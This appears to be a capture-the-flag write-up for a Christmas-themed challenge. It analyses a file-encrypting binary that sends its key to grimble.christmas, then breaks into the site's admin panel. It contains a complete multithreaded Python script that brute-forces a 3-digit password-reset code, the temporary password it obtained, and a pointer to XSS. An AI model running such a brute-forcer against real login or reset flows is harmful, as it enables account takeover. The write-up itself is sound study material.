Throwing the binary in IDA, we see the typical chaos of C++ code… When we try to run the
binary, it more or less immediately exists. We have Antidebug/AntiVM right at the beginning, that
we can patch with NOPs.
Further down we see the iteration of sub directories for files of format “sclaus_*.txt” and calls
into crypto code which perform AES256-GCM encryption (obviously on the file contents), writes
the file contents out and then curls the encryption key to a secret web site. (Monitoring the
execution gives away it’s the encryption key)
Debugging through the code we can see how the file contents is encrypted, the new file is
created, filled with a certain structure and once everything is done, the encryption key is send
out via curl to https://grimble.christmas/save_key

Much to our surprise the website is actually still live

And has an active robots.txt

Unfortunately the /admin URL is password protected:

We can try SQLi and various other approaches, but in the end, it’s all in vain.

But maybe we can reset the password?

We already understood grimble is our main villain, unfortunately we cannot reset his pw. We try
our best with Twinkle.
But all we get is a “MFA” login with a 3 digit code and we only have ONE try…

Now we need to brute the password of an elf. We randomly choose Twinkle again:
import requests
import threading
import sys

# Define the URLs and the reset code

initial_url = "https://grimble.christmas/admin/forgot/?username=Grimble"
reset_code = "666"
invalid_message = "That code is invalid"
attempt = 1

def reset_password():
# Initialize a session to maintain cookies and session data
session = requests.Session()
attempt=1
while attempt<500:
try:
# Step 1: Perform the initial GET request
print(f"{attempt}: Starting GET request to:", initial_url)
attempt+=1
response = session.get(initial_url, allow_redirects=True)

# Step 2: Check if the redirect leads to /admin/forgot/code-entry/

if "/admin/forgot/code-entry/" in response.url:
# Prepare the POST data
post_data = {"reset_code": reset_code}
# Step 3: Send the POST request using the same session
post_response = session.post(response.url, data=post_data)

# Step 4: Check if the response contains the invalid message

if invalid_message in post_response.text:
pass
else:
print("Success! Code is valid.")
print(post_response.text)
sys.exit(1)
break # Exit the loop if the code is valid

else:
print("Unexpected redirection or URL:", response.url)
break # Exit if redirection is not as expected

except requests.RequestException as e:
print(f"An error occurred: {e}")
break # Exit on request errors

# Run the reset_password function

def main():
# Number of threads
num_threads = 10

# Create and start threads

threads = []
for i in range(num_threads):
thread = threading.Thread(target=reset_password, name=f"Thread-{i+1}")
threads.append(thread)
thread.start()

# Wait for all threads to complete

for thread in threads:
thread.join()
print("All threads have completed.")

# Run the main function

if __name__ == "__main__":
main()

This will, after some seconds, output us the page once the MFA has been guessed correctly and
a temporary password
<body class="bg-light position-relative">

<img src="/images/christmas-corner-decoration.png" alt="Decoration Left"
class="top-decoration decoration-left">
<img src="/images/christmas-corner-decoration.png" alt="Decoration Right"
class="top-decoration decoration-right">

<div class="container my-5">

<div class="text-center mb-4">
<h1 class="display-4">Code Entry</h1>
<p>We've sent an email to the email address associated with your
account with a random 3-digit reset code.</p>
</div>

<div class="d-flex justify-content-center">

<div style="max-width: 400px; width: 100%;">
<div class="alert alert-success">Success! Your temporary
password has been set to: KUesxvAXRhuO</div>
<p>You can now log into your account via the <a
href="/admin/login/">login</a> page.</p>
</div>
</div>
</div>

We login as Twinkle and are now able to post comments… A very quick test shows us it’s XSS
time!